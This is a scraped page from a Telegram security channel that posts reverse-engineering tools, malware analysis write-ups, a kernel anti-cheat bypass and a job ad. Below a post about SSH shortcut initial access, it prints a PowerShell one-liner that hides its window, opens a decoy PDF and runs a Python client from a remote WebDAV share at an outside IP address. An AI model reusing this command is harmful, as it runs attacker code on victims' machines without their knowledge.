Source Byte – Telegram
Source Byte
7.76K subscribers
847 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
Custom instruction length for hex-rays

The Instrlen plugin is a tool for IDA Pro that allows for setting the length of an instruction to a custom value. This can be useful when the code is obfuscated or there are jumps after the instruction prefixes.


https://github.com/milankovo/instrlen.git
😁4👍1
CPP / C++ Notes - Windows API Programming Win32
https://caiorss.github.io/C-Cpp-Notes/WindowsAPI-cpp.html#orge9d5c6d
🔥8👍1
Forwarded from K4YT3X's Channel (K4YT3X)
之前一个很简单绕过内核反作弊的方法我开源了:
https://github.com/k4yt3x/InstantSuspend

基本上就是在进程被驱动保护之前你 suspend 它就可以给你个机会 OpenProcess 拿到 handle 或者改代码之类的,有些反作弊解冻进程之后后续还是不能读写内存,有些只要拿到了 handle 后面就能继续用

实在是很简单,也没必要藏着掖着
👍1🔥1😁1🤔1
PhishiUrl

A tool for generating and detecting Unicode domains to identify phishing URLs, aimed at assisting cybersecurity professionals in recognizing and mitigating homograph attacks.



https://github.com/EmadYaY/PhishiUrl
🔥7👍21😁1🙏1
Catalog of key Windows kernel data structures
https://codemachine.com/articles/kernel_structures.html


Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/


Thanks to https://x.com/5mukx
4👾1
Just an attempt to group extracted data from Defender for research purposes.

https://github.com/HackingLZ/ExtractedDefender

credits : Justin Elze
👍2
3
Source Byte
Iran’s State Broadcaster.zip
🤣11👍1😁1
Forwarded from Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access

🔗 Link

#redteam
#initial_access
———
🆔 @Infosec_Fortress
👍43🔥3
or even run python remotely

-w hid -nop  -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
👍5
Forwarded from Alee
There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ] .
[ + ] Familiarity with reverse engineering and malware analysis.
[ + ] Familiarity with one of the programming languages ​​Python, C/Cpp.
[ + ] Familiarity with Linux operating system
[ + ] Familiarity with security concepts.
[ + ] Familiarity with Python, PowerShell and Bash noscripting.
[ + ] Familiarity with cyber attacks


Skills that are considered as advantages:
[ + ] Familiarity with Threat Intelligence
[ + ] Familiarity with CTI concepts
[ + ] Mastery of reverse engineering and binary analysis
[ + ] Familiarity with Windows/Linux internals
🔥13👾711👍1
2🔥2
Agent Tesla Analysis [Part 1: Unpacking]
https://ryan-weil.github.io/posts/AGENT-TESLA-1/



Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/LUMMA-STEALER/
2🔥2👾1